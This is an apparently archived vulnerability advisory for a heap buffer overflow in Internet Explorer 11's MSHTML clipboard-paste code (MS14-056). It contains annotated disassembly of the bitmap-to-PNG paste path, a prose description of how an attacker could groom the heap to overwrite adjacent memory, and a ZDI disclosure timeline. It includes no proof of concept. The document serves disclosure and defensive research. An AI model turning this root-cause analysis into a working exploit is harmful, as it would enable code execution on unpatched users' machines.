72cf655c 8d4c2420lea ecx,[esp+20h]
72cf6560 e819f1bfffcallMSHTML!TSmartHandle<void *,&GlobalUnlock>::~TSmartHandle<void *,&GlobalUnlock> (728f567e)
72cf6565 e963030000jmp MSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf656a 8b4c242cmov ecx,dword ptr [esp+2Ch]
72cf656e e87b8f0200callMSHTML!EdUtil::IsRtfConverterEnabled (72d1f4ee)
72cf6573 85c0testeax,eax
72cf6575 0f84eb000000jeMSHTML!CPasteCommand::PasteFromClipboard+0x431 (72cf6666)
72cf657b ff742410pushdword ptr [esp+10h]
72cf657f ff15e043dc72calldword ptr [MSHTML!_imp__GlobalLock (72dc43e0)]
72cf6585 85c0testeax,eax
72cf6587 0f84ff010000jeMSHTML!CPasteCommand::PasteFromClipboard+0x557 (72cf678c)
72cf658d 8d4c2420lea ecx,[esp+20h]
72cf6591 8bd0mov edx,eax
72cf6593 51pushecx
72cf6594 e8a598fdffcallMSHTML!CRtfToHtmlConverter::StringRtfToStringHtml (72ccfe3e)
72cf6599 ff742410pushdword ptr [esp+10h]
72cf659d 8bf0mov esi,eax
72cf659f ff15dc43dc72calldword ptr [MSHTML!_imp__GlobalUnlock (72dc43dc)]
72cf65a5 85f6testesi,esi
72cf65a7 0f85b4000000jne MSHTML!CPasteCommand::PasteFromClipboard+0x42c (72cf6661)
72cf65ad 397518cmp dword ptr [ebp+18h],esi
72cf65b0 7436jeMSHTML!CPasteCommand::PasteFromClipboard+0x3b3 (72cf65e8)
72cf65b2 397520cmp dword ptr [ebp+20h],esi
72cf65b5 741djeMSHTML!CPasteCommand::PasteFromClipboard+0x39f (72cf65d4)
72cf65b7 ff7524pushdword ptr [ebp+24h]
72cf65ba 8bcbmov ecx,ebx
72cf65bc ff751cpushdword ptr [ebp+1Ch]
72cf65bf ff750cpushdword ptr [ebp+0Ch]
72cf65c2 ff7508pushdword ptr [ebp+8]
72cf65c5 e802bbffffcallMSHTML!CPasteCommand::FirePasteEventAndRemoveSelection (72cf20cc)
72cf65ca 8bf0mov esi,eax
72cf65cc 85f6testesi,esi
72cf65ce 0f85f9020000jne MSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf65d4 ff742420pushdword ptr [esp+20h]
72cf65d8 8b4b08mov ecx,dword ptr [ebx+8]
72cf65db ff750cpushdword ptr [ebp+0Ch]
72cf65de ff7508pushdword ptr [ebp+8]
72cf65e1 e89158fdffcallMSHTML!CHTMLEditor::DoTheDarnIE50PasteHTML (72ccbe77)
72cf65e6 eb1ajmp MSHTML!CPasteCommand::PasteFromClipboard+0x3cd (72cf6602)
72cf65e8 ff7524pushdword ptr [ebp+24h]
72cf65eb 8bcbmov ecx,ebx
72cf65ed ff751cpushdword ptr [ebp+1Ch]
72cf65f0 ff7520pushdword ptr [ebp+20h]
72cf65f3 ff74242cpushdword ptr [esp+2Ch]
72cf65f7 ff750cpushdword ptr [ebp+0Ch]
72cf65fa ff7508pushdword ptr [ebp+8]
72cf65fd e861e4ffffcallMSHTML!CPasteCommand::HandleUIPasteHTML (72cf4a63)
72cf6602 ff742420pushdword ptr [esp+20h]
72cf6606 8bf0mov esi,eax
72cf6608 ff15f044dc72calldword ptr [MSHTML!_imp__GlobalFree (72dc44f0)]
72cf660e eb23jmp MSHTML!CPasteCommand::PasteFromClipboard+0x3fe (72cf6633)
72cf6610 837d1800cmp dword ptr [ebp+18h],0
72cf6614 0f8578020000jne MSHTML!CPasteCommand::PasteFromClipboard+0x65d (72cf6892)
72cf661a ff7524pushdword ptr [ebp+24h]
72cf661d 8bcbmov ecx,ebx
72cf661f ff751cpushdword ptr [ebp+1Ch]
72cf6622 ff7520pushdword ptr [ebp+20h]
72cf6625 50pusheax
72cf6626 ff750cpushdword ptr [ebp+0Ch]
72cf6629 ff7508pushdword ptr [ebp+8]
72cf662c e832e4ffffcallMSHTML!CPasteCommand::HandleUIPasteHTML (72cf4a63)
72cf6631 8bf0mov esi,eax
72cf6633 85f6testesi,esi
72cf6635 0f8992020000jns MSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf663b 8b4d08mov ecx,dword ptr [ebp+8]
72cf663e 8b01mov eax,dword ptr [ecx]
72cf6640 ff9080000000calldword ptr [eax+80h]
72cf6646 85c0testeax,eax
72cf6648 0f847f020000jeMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf664e 8b4d0cmov ecx,dword ptr [ebp+0Ch]
72cf6651 8b01mov eax,dword ptr [ecx]
72cf6653 ff9080000000calldword ptr [eax+80h]
72cf6659 85c0testeax,eax
72cf665b 0f846c020000jeMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6661 be64000480mov esi,80040064h
72cf6666 47inc edi
72cf6667 8344241414add dword ptr [esp+14h],14h
72cf666c 3b7c2448cmp edi,dword ptr [esp+48h]
72cf6670 0f8d57020000jge MSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6676 e925feffffjmp MSHTML!CPasteCommand::PasteFromClipboard+0x26b (72cf64a0)

7202667b 50pusheax
7202667c ff15e4430f72calldword ptr [MSHTML!_imp__GlobalSize (720f43e4)] <eax> = 
72026682 89442450mov dword ptr [esp+50h],eaxuBitmapInfoSize<stack> = uBitmapInfoSize<eax>
72026686 83f82ccmp eax,2Chif (uBitmapInfoSize<eax> < 0x2C)
72026689 0f82cdfeffffjb7202655c goto label1
7202668f 8b17mov edx,dword ptr [edi]larg2<edx> = poBitmapInfo<edi>->BITMAPINFOHEADER.biSize
72026691 8d442438lea eax,[esp+38h]&uActualBitmapInfoSize<eax> = &(uActualBitmapInfoSize<stack>)
72026695 8b4f14mov ecx,dword ptr [edi+14h]larg1<ecx> = poBitmapInfo<edi>->BITMAPINFOHEADER.biSizeImage
72026698 8364243800and dword ptr [esp+38h],0uActualBitmapInfoSize<stack> = 0
7202669d 50pusheaxlarg3<stack> = &pabImageData<eax>
7202669e e8f9da28ffcall712b419c hResult<eax> = MSHTML!UIntAdd(uActualBitmapInfoSize = poBitmapInfo->biSizeImage + poBitmapInfo->biSize
poBitmapInfo<edi>->biSizeImage<ecx> hResult<eax> = error code on integer overflow
poBitmapInfo<edi>->biSize<edx>
&uActualBitmapInfoSize<eax>
);
720266a3 8bf0mov esi,eaxhResult<esi> = hResult<eax>
720266a5 85f6testesi,esiif (hResult<esi> < 0)
720266a7 0f88affeffffjs7202655c goto label1
720266ad 8b442450mov eax,dword ptr [esp+50h]uBitmapInfoSize<eax> = uBitmapInfoSize<stack>
720266b1 3b442438cmp eax,dword ptr [esp+38h]if (uBitmapInfoSize<eax> < uActualBitmapInfoSize<stack>)
720266b5 0f82a1feffffjb7202655c goto label1
720266bb 8364243400and dword ptr [esp+34h],0poOriginalBitmap<stack> = 0
720266c0 8d4c244clea ecx,[esp+4Ch]&uBitmapSize<ecx> = &(uBitmapSize<stack>)
720266c4 8364244c00and dword ptr [esp+4Ch],0uBitmapSize<stack> = 0
720266c9 51pushecxlarg4<stack> = &uBitmapSize<ecx>
720266ca 8d4c2438lea ecx,[esp+38h]&poBitmap<ecx> = &(poBitmap<stack>)
720266ce 51pushecxlarg3<stack> = &poBitmap<ecx>
720266cf 50pusheaxlarg2<stack> = uBitmapInfoSize<eax>
720266d0 57pushedilarg1<stack> = poBitmapInfo<edi>
720266d1 e8af020000call72026985 hResult<eax> = MSHTML!CPasteCommand::PrependBitmapHeader(
poBitmapInfo = poBitmapInfo<edi>
uBitmapInfoSize = uBitmapInfoSize<eax>
ppoBitmap = &poBitmap,
puBitmapSize = &uBitmapSize);
720266d6 8bf0mov esi,eaxhResult<esi> = hResult<eax>
720266d8 85f6testesi,esiif (hResult<esi> != 0)
720266da 0f857cfeffffjne 7202655c goto label1
720266e0 21442438and dword ptr [esp+38h],eaxpabImageData<stack> = NULL<eax>
720266e4 21442450and dword ptr [esp+50h],eaxuPngImageSize<stack> = 0<eax>
720266e8 8d442450lea eax,[esp+50h]&uPngImageSize<eax> = &(uPngImageSize<stack>)
720266ec 50pusheaxlarg4<stack> = &uPngImageSize<eax>
720266ed 8d44243clea eax,[esp+3Ch]&pabImageData<eax> = &(pabImageData<stack>)
720266f1 50pusheaxlarg3<stack> = &pabImageData<eax>
720266f2 ff742454pushdword ptr [esp+54h]larg2<stack> = uBitmapSize<stack>
720266f6 ff742440pushdword ptr [esp+40h]larg1<stack> = poBitmap<stack>
720266fa e8feb1ffffcall720218fd MSHTML!CPasteCommand::ConvertBitmaptoPng(
poBitmap = poBitmap<stack>,
 **** SHIT HITS FAN ****uBitmapSize = uBitmapSize<stack>,
ppoPngImage = &pabImageData,
puPngImageSize = &uPngImageSize<stack>)
720266ff ff742434pushdword ptr [esp+34h]
72026703 8bf0mov esi,eax
72026705 e8fdc85fffcall71623007 MSHTML!operator delete(...)
7202670a 59pop ecx
7202670b 85f6testesi,esi
7202670d 0f8549feffffjne 7202655c goto label1;
72026713 ff7524pushdword ptr [ebp+24h]
72026716 8bcbmov ecx,ebx
72026718 ff751cpushdword ptr [ebp+1Ch]
7202671b ff7520pushdword ptr [ebp+20h]
7202671e ff74245cpushdword ptr [esp+5Ch]
72026722 ff742448pushdword ptr [esp+48h]
72026726 ff750cpushdword ptr [ebp+0Ch]
72026729 ff7508pushdword ptr [ebp+8]
7202672c e81ce2ffffcall7202494d MSHTML!CPasteCommand::HandlePasteImage(...)
72026731 ff742438pushdword ptr [esp+38h]
72026735 8bf0mov esi,eax
72026737 e8cbc85fffcallMSHTML!operator delete (71623007)
7202673c 59pop ecx
7202673d e91afeffffjmp 7202655clabel1

7202650c 8b442410mov eax,dword ptr [esp+10h]
72026510 85fftestedi,edi
72026512 0f84f8000000jeMSHTML!CPasteCommand::PasteFromClipboard+0x3db (72026610)
72026518 83ff01cmp edi,1
7202651b 744djeMSHTML!CPasteCommand::PasteFromClipboard+0x335 (7202656a)
7202651d 83ff02cmp edi,2
72026520 0f84d1020000jeMSHTML!CPasteCommand::PasteFromClipboard+0x5c2 (720267f7)
72026526 0f8e3a010000jle MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72026666)
7202652c 83ff04cmp edi,4
7202652f 0f8e0d020000jle MSHTML!CPasteCommand::PasteFromClipboard+0x50d (72026742)
72026535 83ff08cmp edi,8
72026538 0f8528010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72026666)
7202653e 50pusheax
7202653f ff15e0430f72calldword ptr [MSHTML!_imp__GlobalLock (720f43e0)]
72026545 8bf8mov edi,eax
72026547 8b442410mov eax,dword ptr [esp+10h]
7202654b 89442420mov dword ptr [esp+20h],eax
7202654f 85fftestedi,edi
72026551 0f8524010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x446 (7202667b)
72026557 be0e000780mov esi,8007000Eh
label1:
7202655c 8d4c2420lea ecx,[esp+20h]
72026560 e819f1bfffcallMSHTML!TSmartHandle<void *,&GlobalUnlock>::~TSmartHandle<void *,&GlobalUnlock> (71c2567e)
72026565 e963030000jmp MSHTML!CPasteCommand::PasteFromClipboard+0x698 (720268cd)
MSHTML!CPasteCommand..PrependBitmapHeader.txt
MSHTML!CPasteCommandPrependBitmapHeader(
VOID* poBitmapInfo<ebp+8>,
UINT uBitmapInfoSize<ebp+C>,
VOID** ppoBitmap<ebp+10>,
UINT* uBitmapSize<ebp+14>
):
uBitmapSize<ebp-4>
72cf6985 8bffmov edi,edi
72cf6987 55pushebp
72cf6988 8becmov ebp,esp
72cf698a 51pushecx
72cf698b 8b4d0cmov ecx,dword ptr [ebp+0Ch]larg1<ecx> = uBitmapInfoSize<ebp+C>
72cf698e 8d45fclea eax,[ebp-4]&uBitmapSize<eax> = &uBitmapSize<ebp-4>
72cf6991 8365fc00and dword ptr [ebp-4],0uBitmapSize<ebp-4> = 0
72cf6995 56pushesi
72cf6996 57pushedi
72cf6997 50pusheaxlarg3<stack> = &uBitmapSize<eax>
72cf6998 6a0epush0Eh
72cf699a 5apop edxlarg2<edx> = 0xE
72cf699b e8fcd728ffcall71f8419c MSHTML!UIntAdd( uBitmapSize = uBitmapInfoSize + 0xE
uBitmapInfoSize<ecx>, 
0xE<edx>, hResult = error code on integer overflow
&uBitmapSize<eax>);
72cf69a0 8bf8mov edi,eaxhResult<edi> = hResult<eax>
72cf69a2 85fftestedi,ediif (hResult<edi> < 0) if (hResult < 0)
72cf69a4 7850js72cf69f6 goto return_error;return 0x8007000E;
72cf69a6 8b75fcmov esi,dword ptr [ebp-4]uBitmapSize<esi> = uBitmapSize<ebp-4>
72cf69a9 56pushesilarg3<stack> = uBitmapSize<esi>
72cf69aa 6a00push0larg2<stack> = 0
72cf69ac ff3510ccd972pushdword ptr [72d9cc10] larg1<stack> = MSHTML!g_hProcessHeap
72cf69b2 e8eaa620ffcall71f010a1 poBitmap<eax> = MSHTML!HeapAlloc( poBitmap<eax> = HeapAlloc(g_hProcessHeap, 0, uBitmapSize);
MSHTML!g_hProcessHeap,
0,
uBitmapSize<esi>);
72cf69b7 8b4d10mov ecx,dword ptr [ebp+10h]ppoBitmap<ecx> = ppoBitmap<ebp+10>
72cf69ba 8901mov dword ptr [ecx],eax*(ppoBitmap<ecx>) = poBitmap<eax> *ppoBitmap = poBitmap
72cf69bc 85c0testeax,eaxif (poBitmap<eax> == NULL)if (poBitmap == NULL)
72cf69be 7436je72cf69f6 goto return_error;return 0x8007000E;
72cf69c0 ff750cpushdword ptr [ebp+0Ch]larg4<stack> = uBitmapInfoSize
72cf69c3 b9424d0000mov ecx,4D42h"BM"<ecx> = 0x4D42
72cf69c8 897002mov dword ptr [eax+2],esipoBitmap<eax>->BITMAPFILEHEADER.bfSize = uBitmapSize<esi> poBitmap->BITMAPFILEHEADER.bfSize = uBitmapSize
72cf69cb ff7508pushdword ptr [ebp+8]larg3<stack> = poBitmapInfo<ebp+8>
72cf69ce 668908mov word ptr [eax],cxpoBitmap<eax>->BITMAPFILEHEADER.bfType = "BM"<cx> poBitmap->BITMAPFILEHEADER.bfType = "BM"
72cf69d1 33c9xor ecx,ecx0<ecx> = 0
72cf69d3 ff750cpushdword ptr [ebp+0Ch]larg2<stack> = uBitmapInfoSizepoBitmap->BITMAPFILEHEADER.bfReserved1 = 0
72cf69d6 894806mov dword ptr [eax+6],ecxpoBitmap<eax>->BITMAPFILEHEADER.bfReserved12 = 0poBitmap->BITMAPFILEHEADER.bfReserved2 = 0
72cf69d9 c7400a36000000mov dword ptr [eax+0Ah],36hpoBitmap<eax>->BITMAPFILEHEADER.bfOffBits = 0x36poBitmap->BITMAPFILEHEADER.bfOffBits = 0x36
72cf69e0 83c00eadd eax,0Eh&(poBitmap.BITMAPINFO)<eax> = poBitmap<eax> + sizeof(BITMAPFILEHEADER)
72cf69e3 50pusheaxlarg1<stack> = &oBitmapInfo<eax>
72cf69e4 ff159841dc72calldword ptr [72dc4198] MSHTML!_imp__memcpy_s(memcpy_s(&(poBitmap->BITMAPINFO), uBitmapInfoSize, poBitmapInfo, uBitmapInfoSize)
&(poBitmap.BITMAPINFO)<stack>,
uBitmapInfoSize<stack>,
poBitmapInfo<stack>,
uBitmapInfoSize<stack>);
72cf69ea 8b4514mov eax,dword ptr [ebp+14h]puBitmapSize<eax> = puBitmapSize<ebp+14>
72cf69ed 83c410add esp,10hWTF!?
72cf69f0 8930mov dword ptr [eax],esi*(puBitmapSize<eax>) = uBitmapSize<esi> *puBitmapSize = uBitmapSize
72cf69f2 8bc7mov eax,edihResult<eax> = hResult<edi> return s_OK;
72cf69f4 eb05jmp 72cf69fb goto return;
return_error:
72cf69f6 b80e000780mov eax,8007000EhhResult<eax> = 0x8007000E
return:
72cf69fb 5fpop edi
72cf69fc 5epop esi
72cf69fd 8be5mov esp,ebp
72cf69ff 5dpop ebp
72cf6a00 c21000ret 10hreturn hResult<eax>


Exploit

An attacker looking to exploit this issue will commonly attempt to get the memory allocated to store the PNG image in a location that is followed by a pre-allocated memory block that contains information the attacker would like to modify. Using the buffer overflow, the attacker can overwrite this pre-allocated memory block with attacker controlled data. Depending on the type of the pre-allocated memory, this could allow the attacker to read or modify arbitrary information within the process and take control of execution flow. No attempt was made to create a Proof-of-Concept that shows this level of control.

Time-line

8 May 2014: This vulnerability was submitted to ZDI.
9 June 2014: This vulnerability was acquired by ZDI.
23 June 2014: This vulnerability was disclosed to Microsoft by ZDI.
14 October 2014: This vulnerability was address by Microsoft in MS14-056.
21 December 2016: Details of this vulnerability are released.
-->
Microsoft Internet Explorer 11 – MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)

Microsoft Internet Explorer 11 – MSHTML CPasteCommand::ConvertBitmaptoPng Heap Buffer Overflow (MS14-056)
